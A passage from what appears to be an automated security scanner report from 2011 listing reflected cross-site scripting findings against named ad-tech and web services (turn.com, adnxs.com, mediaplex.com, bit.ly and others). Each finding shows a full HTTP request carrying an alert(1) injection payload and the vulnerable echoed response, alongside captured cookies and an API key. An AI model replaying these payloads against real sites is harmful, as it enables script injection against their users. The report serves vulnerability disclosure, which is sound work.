Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8995059535480416422; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:50 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:05:49 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8995059535480416422&rnd=3834016449463094093&fpid=53bfc"><script>alert(1)</script>20c739125c2&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.2. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a99"><script>alert(1)</script>d633ab318d4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6&sp=72a99"><script>alert(1)</script>d633ab318d4 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8995059535480416422; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:50 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:05:49 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8995059535480416422&rnd=3302508506972481702&fpid=6&nu=n&t=&sp=72a99"><script>alert(1)</script>d633ab318d4&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.3. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b566b'-alert(1)-'5473cd1b396 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193b566b'-alert(1)-'5473cd1b396&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:02:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 01:02:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 01:02:33 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193b566b'-alert(1)-'5473cd1b396&external_user_id=9223372036854775807&expiration=0" width="0" height="0"/>');

5.4. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e2bb'-alert(1)-'8f47cdc553a was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match5e2bb'-alert(1)-'8f47cdc553a HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:02:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 01:02:53 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 01:02:53 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match5e2bb'-alert(1)-'8f47cdc553a?admeld_adprovider_id=193&external_user_id=9223372036854775807&expiration=0" width="0" height="0"/>');

5.5. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://affiliates.eblastengine.com
Path:   /Widgets/EmailSignup.aspx

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5c8f"style%3d"x%3aexpression(alert(1))"39952ff8d9c was submitted in the height parameter. This input was echoed as d5c8f"style="x:expression(alert(1))"39952ff8d9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6AD&height=100d5c8f"style%3d"x%3aexpression(alert(1))"39952ff8d9c&width=275 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:04:01 GMT
Last-Modified: Sun, 04 Sep 2011 01:03:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:03:00 GMT
Content-Length: 6969


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
<table id="tblWidget" cellpadding="0" cellspacing="0" border="0" style="width:275px;height:100d5c8f"style="x:expression(alert(1))"39952ff8d9cpx;">
...[SNIP]...

5.6. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [wcguid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://affiliates.eblastengine.com
Path:   /Widgets/EmailSignup.aspx

Issue detail

The value of the wcguid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d48"style%3d"x%3aexpression(alert(1))"2ce761eaace was submitted in the wcguid parameter. This input was echoed as e7d48"style="x:expression(alert(1))"2ce761eaace in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6ADe7d48"style%3d"x%3aexpression(alert(1))"2ce761eaace&height=100&width=275 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:03:41 GMT
Last-Modified: Sun, 04 Sep 2011 01:02:41 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:02:41 GMT
Content-Length: 6922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
<input type="hidden" name="hdnWCGUID" id="hdnWCGUID" value="29DFC999-F0F3-482A-9516-C8414B36C6ADe7d48"style="x:expression(alert(1))"2ce761eaace" />
...[SNIP]...

5.7. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://affiliates.eblastengine.com
Path:   /Widgets/EmailSignup.aspx

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be580"style%3d"x%3aexpression(alert(1))"d63f3064f0 was submitted in the width parameter. This input was echoed as be580"style="x:expression(alert(1))"d63f3064f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6AD&height=100&width=275be580"style%3d"x%3aexpression(alert(1))"d63f3064f0 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:04:11 GMT
Last-Modified: Sun, 04 Sep 2011 01:03:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:03:10 GMT
Content-Length: 6967


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
<table id="tblWidget" cellpadding="0" cellspacing="0" border="0" style="width:275be580"style="x:expression(alert(1))"d63f3064f0px;height:100px;">
...[SNIP]...

5.8. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16e33'-alert(1)-'29065005ae7 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88303-3335-5?mpt=111967816e33'-alert(1)-'29065005ae7&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 545
Date: Sun, 04 Sep 2011 00:45:45 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=111967816e33'-alert(1)-'29065005ae7">
...[SNIP]...

5.9. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed8b5'%3balert(1)//13bb1e92c92 was submitted in the mpvc parameter. This input was echoed as ed8b5';alert(1)//13bb1e92c92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3fed8b5'%3balert(1)//13bb1e92c92 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 545
Date: Sun, 04 Sep 2011 00:45:47 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?ed8b5';alert(1)//13bb1e92c92http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=1119678">
...[SNIP]...

5.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b9f9'%3balert(1)//ba9ef290c77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b9f9';alert(1)//ba9ef290c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&2b9f9'%3balert(1)//ba9ef290c77=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 548
Date: Sun, 04 Sep 2011 00:45:49 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?&2b9f9';alert(1)//ba9ef290c77=1http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=1119678">
...[SNIP]...

5.11. http://api.bit.ly/shorten [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cc1c2<script>alert(1)</script>74bf979fd was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURLcc1c2<script>alert(1)</script>74bf979fd&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&refreshUrlTimestamp=1315097050303 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:46:12 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 356
Etag: "573ac502eb2353400a5c161b299b6031bb670f92"

processBitlyURLcc1c2<script>alert(1)</script>74bf979fd({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903": {"userHash": "rsX0BA", "shortKeywordUrl": "", "hash": "pwdflq",
...[SNIP]...

5.12. http://api.bit.ly/shorten [longUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 7e94d<script>alert(1)</script>9e18e1118a5 was submitted in the longUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D201109037e94d<script>alert(1)</script>9e18e1118a5&refreshUrlTimestamp=1315097050303 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:46:14 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 358
Etag: "2f364296de6d49e458eff08a4defecc36df64774"

processBitlyURL({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D201109037e94d<script>alert(1)</script>9e18e1118a5": {"userHash": "qLujX3", "shortKeywordUrl": "", "hash": "parItt", "shortCNAMEUrl": "http://reut.rs/qLujX3", "shortUrl": "http://reut.rs/qLujX3"}}, "statusCode": "OK"})

5.13. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 9c917<script>alert(1)</script>7981b6f966 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a59c917<script>alert(1)</script>7981b6f966&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315096942310726%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zz2RAI0uRfisMtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KdOKh03Kvii5Taj5XcunNcMDa7Re6IGD4lKWNB0md3rj0Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfsp04qHTcqipLlNqPldy6c1wwH4DELwm2ipwNsNipLFWKZvgDTbwiiAhQOisLcafhbACBAJnPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9sU8nhAxdAK9Qieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:57:41 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b42da86024eb8489645733b320;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 91
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a59c917<script>alert(1)</script>7981b6f966)

5.14. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied unencoded into the response body. The payload 2c114<script>alert(1)</script>431ab9e4b41 was submitted in the callback_url parameter and was echoed unmodified in the application's response, which labels it an "Unknown Referer": the endpoint evidently validates callback_url against a list of known referers and echoes the rejected value back.

